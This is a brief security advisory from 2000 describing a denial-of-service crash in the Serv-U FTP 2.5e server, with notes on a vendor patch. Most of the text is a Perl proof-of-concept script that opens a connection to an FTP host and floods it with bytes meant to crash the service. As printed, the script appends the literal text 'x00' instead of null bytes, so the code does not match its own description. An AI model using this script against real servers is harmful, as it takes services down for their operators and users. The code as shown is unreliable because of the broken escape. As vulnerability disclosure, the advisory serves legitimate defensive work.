FTP Serv-U 2.5e Subject to Denial of Service
By sending 5000 null bytes to the FTP service, the service can be made to crash.
August 6, 2000
Reported August 7, 2000 by Blue Panda
VERSIONS EFFECTED
FTP Serv-U 2.5e DESCRIPTION
The Serv-U FTP service can be made to generate stack faults by sending the service approximately 5000 null bytes. Such an attack could render the underlying operating system unstable where it may eventually crash.
DEMONSTRATION
#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#
use IO::Socket;
$host = "ftp.host.com";
$port = "21";
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.";
print "done.";
$counter = 0;
$buf = "";
while ($counter < 5000) {
$buf .= "x00";
$counter += 1;
}
print $socket "$buf";
sleep(4);
close($socket);
VENDOR RESPONSE
The vendor, Deerfield, is aware of the problem and has released a patched version 2.5f.
CREDIT
Discovered by Blue Panda
About the Author
You May Also Like